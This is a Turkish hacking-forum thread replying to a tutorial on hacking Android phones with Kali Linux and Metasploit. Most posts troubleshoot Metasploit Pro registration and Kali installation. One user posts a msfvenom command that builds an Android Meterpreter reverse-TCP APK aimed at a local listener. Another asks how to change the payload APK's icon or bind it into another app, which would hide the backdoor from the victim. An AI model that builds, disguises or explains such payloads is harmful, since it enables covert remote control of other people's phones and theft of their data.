VMware + Kali Linux + M.e.t.a.sploit + Android Hack

Cermencik

Üye
25 Haz 2015
187
0
Hocam go_pro yazdıktan sonra 5 dkk bekliyor ve şöyle bir hata alıyorum.

Kod:
msf > go_pro
[*] Starting the ****sploit services. This can take a little time.
[*] Starting PostgreSQL 9.1 database server: main.
[*] Starting ****sploit rpc server: prosvc.
[*] ****sploit web server already started.
[*] Starting ****sploit worker: worker
........................................................................................................................................................................................................
[!] For some reason, Community / Pro didn't start in a timely fashion.
[!] You might want to restart the ****sploit services by typing
[!] 'service ****sploit restart'. Sorry it didn't work out.
msf >

Birde ben kaliyi direk kullanmadığım bilgisayarıma kurdum wm ile uğraşmadan. Acaba benim gibi 2. bir pcye kuranlar için yazdıklarınızda hangi kısımdan başlamalıyız. Port açma vs. için diyorum.

Merhaba. VMware uzerine kurmuyorsaniz Kali.org adresinden dual boot ya da direk kurulum icin olan versionlarindan birini indirip kurmaniz gerekiyor. Bu anlatimda vermis oldugum version VMware Workstation ya da VirtualBox programlari ile bilgisayariniza kuracaginiz sanal masaustleri icin hazirlanmistir. Bu durumda normal bilgisayariniza kurulum icin bu anlatim isinize yaramaz. Fakat kurulum asamasindan sonra yapilacaklar icin cok fazla fark ya da sorun olacagini sanmiyorum. Buradaki adimlari takip edebilirsiniz.

M.etasploit kayit islemine gelince ; terminal uzerinden go_pro komutu ile islemi baslatamadiysaniz, once terminal uzerinden "service postgresql start" ve "service m.e.t.a.sploit start" komutlari ( tirnak isaretleri ve noktalar olmadan ) ile sql ve m.etasploit servislerini baslattiktan sonra direk olarak internet tarayicisina https://127.0.0.1:9392 yazarak kayit sayfasina ulasmayi deneyebilirsiniz. Sayfa hemen acilmayabilir, F5 ile sayfayi bir kac kez yenilemeyi deneyin. Acilacaktir. Sayfa acildiktan sonra yine bu anlatimla devam ederek kayit isleminizi tamamlayabilirsiniz.

Saygilar.

Son düzenleme:

kaaali

Yeni üye
11 Ağu 2015
6
0
Ankara
Hocam komutları yazdıktan sonra verdiğiniz linke girmiyor go_pro komutu da aynı çalışmıyor.
Acaba port açma işleminde mi hata var. Aşağıda ki resimleri kontrol edermisiniz

mzL2r2.png

EqJPzD.png

j2nyvg.png

Cermencik

Üye
25 Haz 2015
187
0
Hocam komutları yazdıktan sonra verdiğiniz linke girmiyor go_pro komutu da aynı çalışmıyor.

Port acma islemlerinde problem gorunmuyor. Yasadiginiz sorun portlarla ilgili degil. Dosyalar hazir kurulu geldigi ve sanal masaustu icin hazirlandigindan dolayi problem yasiyorsunuz buyuk ihtimalle. Kali resmi sitesinden normal kurulum dosyasini indirerek kurmayi deneyiniz. Kali 2.0 dosyalari yayinlandi bu arada. 2.0 surumuyle de yolunuza devam edebilirsiniz. Yeni versionda Community-Pro secenekleri cikarilmis durumda. M.etasploit Framework icerigiyle birlikte geliyor ve kayit gerektirmeden kullanabilirsiniz. Community - Pro seceneklerinden birini tercih edecek olursaniz rapid7 sitesinden indirmeniz gerekecek. Bu iki secenek icin kayit gerekli yine. Fiziksel disk uzerine kurup denemedigim icin cok detaya giremiyorum. Ozur dilerim.

kaaali

Yeni üye
11 Ağu 2015
6
0
Ankara

Port acma islemlerinde problem gorunmuyor. Yasadiginiz sorun portlarla ilgili degil. Dosyalar hazir kurulu geldigi ve sanal masaustu icin hazirlandigindan dolayi problem yasiyorsunuz buyuk ihtimalle. Kali resmi sitesinden normal kurulum dosyasini indirerek kurmayi deneyiniz. Kali 2.0 dosyalari yayinlandi bu arada. 2.0 surumuyle de yolunuza devam edebilirsiniz. Yeni versionda Community-Pro secenekleri cikarilmis durumda. M.etasploit Framework icerigiyle birlikte geliyor ve kayit gerektirmeden kullanabilirsiniz. Community - Pro seceneklerinden birini tercih edecek olursaniz rapid7 sitesinden indirmeniz gerekecek. Bu iki secenek icin kayit gerekli yine. Fiziksel disk uzerine kurup denemedigim icin cok detaya giremiyorum. Ozur dilerim.

Tamamdır hocam teşekkür ederim 2.0 indirdikten sonra tekrar denerim.

Cermencik

Üye
25 Haz 2015
187
0
Tamamdır hocam teşekkür ederim 2.0 indirdikten sonra tekrar denerim.

Rica ederim. Umarim sorun yasamazsiniz. 2.0 surumunu az once resmi siteden indirip sorunsuz bir sekilde actim. Problem gozukmuyor su ana kadar.

02d3

Kıdemli Üye
23 Haz 2015
2,581
1
LA
Güzel paylaşım. Renklendirir ve yazı boyutunu arttırırsan daha iyi olabilir.

Cermencik

Üye
25 Haz 2015
187
0
Güzel paylaşım. Renklendirir ve yazı boyutunu arttırırsan daha iyi olabilir.

Konuyu yeniden duzenledim. Yazi boyutlarini ayarladim. Renklendirmeleri duzelttim. Icindekiler seklinde ekleme yaptim. Umarim daha anlasilir olmustur ve insanlar aradiklarini daha cabuk bulurlar. Onerilerin icin tesekkur ederim.

Yalniz bir konu ile ilgili sitem etmemek elde degil. Tum bu anlatim ve videolar icin saatler harcandi, tek tek yazildi, duzenlendi, kontrol edildi, sagdan soldan yazi bulup kopyala yapistir yontemi ile hazinlanmadi, konu 500 kusur kez goruntulenmis ve yalnizca 1 kisinin isine yaramis sanirim ki 1 kisi tesekkur butonu kullanmis. Uzucu geldi bana biraz bu durum. .)

Neyse, onemli olan birilerinin isine yaramasi sonucta. Tesekkur olmasa da olur diyerek 1 kisiye de olsa yararli bir seyler paylasmanin verdigi haz ile yetinelim. .)

Saygilar.

kaaali

Yeni üye
11 Ağu 2015
6
0
Ankara
Hocam kali 2 ile ****sploit sorununu çözdüm ve herşey çalışıyor. Sormak istediğim hazırladığımız apk'nin iconunu nasıl değiştirebiliriz. Veya bu apk'yı başka bir apk ile birleştirme şansımız var mı.

sirdisi

Yeni üye
9 Ocak 2011
1
0
anlatım on numara olmus konuyu guncellesen kali linux 2.0 icinde aynı anlatımı yapırsan sevınırım elıne saglık

adsiz72

Yeni üye
17 Nis 2015
13
0
venedik
root@kali:~/Downloads# tar -xzvf Apache_OpenOffice_4.1.1_Linux_x86-64_langpack-deb_tr.tar.gz
tar (child): Apache_OpenOffice_4.1.1_Linux_x86-64_langpack-deb_tr.tar.gz: open olanaksız: Böyle bir dosya ya da dizin yok
tar (child): Error is not recoverable: exiting now
tar: Child returned status 2
--------------------------------------------------------
hata veriyor

trl27

Yeni üye
8 Nis 2012
15
0
Bu hatayı alıyorum ne yapmam gerek ?
Kod:
msf > go_pro
[-] Unknown command: go_pro.
msf > msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=0000 R > /root/Desktop/test.apk
[*] exec: msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.4 LPORT=0000 R > /root/Desktop/test.apk

sh: 1: cannot create /root/Desktop/trl.apk: Directory nonexistent
msf >

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.